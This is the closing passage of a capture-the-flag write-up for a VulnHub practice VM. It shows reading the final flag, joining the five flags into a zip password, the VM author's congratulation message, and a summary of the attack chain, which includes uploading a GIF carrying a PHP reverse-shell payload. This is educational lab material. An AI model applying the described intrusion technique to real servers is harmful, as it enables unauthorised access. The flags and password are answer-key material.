dr-xr-xr-x 202 root     root        0 Oct  5 06:36 proc
drwx------   3 root     root     4.0K Oct  5 06:37 root
drwxr-xr-x  25 root     root      940 Oct  5 11:25 run
drwxr-xr-x   2 root     root      12K Oct  2 17:58 sbin
drwxr-xr-x   2 root     root     4.0K Apr 19 09:31 snap
drwxr-xr-x   2 root     root     4.0K Apr 20 17:08 srv
dr-xr-xr-x  13 root     root        0 Oct  5 11:22 sys
drwxrwxrwt   9 root     root     4.0K Oct  5 15:09 tmp
drwxr-xr-x  12 root     root     4.0K Jul  6 11:01 usr
drwxr-xr-x  15 root     root     4.0K Jul 14 13:53 var
lrwxrwxrwx   1 root     root       29 Oct  2 18:00 vmlinuz -> boot/vmlinuz-4.4.0-38-generic
lrwxrwxrwx   1 root     root       29 Jul 14 13:38 vmlinuz.old -> boot/vmlinuz-4.4.0-31-generic

With our www-data account privs we can now read the final flag!!

cat .5.txt
FIFTH FLAG!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
YOU DID IT!!!!!!!!!!!!!!!!!!!!!!!!!!!!
OH RICHARD DON'T RUN AWAY FROM YOUR FEELINGS!!!!!!!!

Flag data: Buttcrack

Ok, so NOW what you do is take the flag data from each flag and blob it into one big chunk.
So for example, if flag 1 data was "hi" and flag 2 data was "there" and flag 3 data was "you"
you would create this blob:

hithereyou

Do this for ALL the flags sequentially, and this password will open the loot.zip in Big Tom's
folder and you can call the box PWNED.

We have all the flags, hacked all necessary things - now we get to extract LOOT.ZIP.
All the flag data:

B34rcl4ws
Z4l1nsky
TinyHead
EditButton
Buttcrack
= B34rcl4wsZ4l1nskyTinyHeadEditButtonButtcrack

Extract the THE-END.txt with the password. It reads:

YOU CAME.
YOU SAW.
YOU PWNED.

Thanks to you, Tommy and the crew at Callahan Auto will make 5.3 cajillion dollars this year.

GREAT WORK!

I'd love to know that you finished this VM, and/or get your suggestions on how to make the next
one better.

Please shoot me a note at 7ms @ 7ms.us with subject line "Here comes the meat wagon!"

Or, get in touch with me other ways:

* Twitter: @7MinSec
* IRC (Freenode): #vulnhub (username is braimee)

Lastly, please don't forget to check out www.7ms.us and subscribe to the podcast at
bit.ly/7minsec

</shamelessplugs>

Thanks and have a blessed week!

-Brian Johnson
7 Minute Security

 

Conclusion

In this VM we had to restore service to a webpage by restoring a backup. But because everyone was having a bad monday or something and so nobody was available to send me even the simplest creds. So we hacked the company blog to get into the funky FTP server only to have to hack into an illicit dropbox to find the passwords stored in a secured zip and then login to SSH to restore the backup. I stumbled onto a strange .TXT-file in / which could only be read by root or "www-data" and had 777 privs on the upload folder of the dodgy dropbox - which btw allowed .GIFs to be executed as code!!1 So I took an awesome GIF, made it more awesomer with a PHP reverse_tcp payload, uploaded it and popped a shell. For the lulz you know. This may be fun to tinker with as it covered some basic webdesign security and may inspire me to make a certain lab setup. Or try elevation to root on. I was doing this without any outside help so I was unable to figure out what the "hi.txt" was for, but my guess would be a discontinued flag.

B1g up to Brian Johnson @7MinSec for making this very entertaining and somewhat relatable VM and @VulnHub for hosting it. I had a fun time with it!
Find more VM's like these and more on VulnHub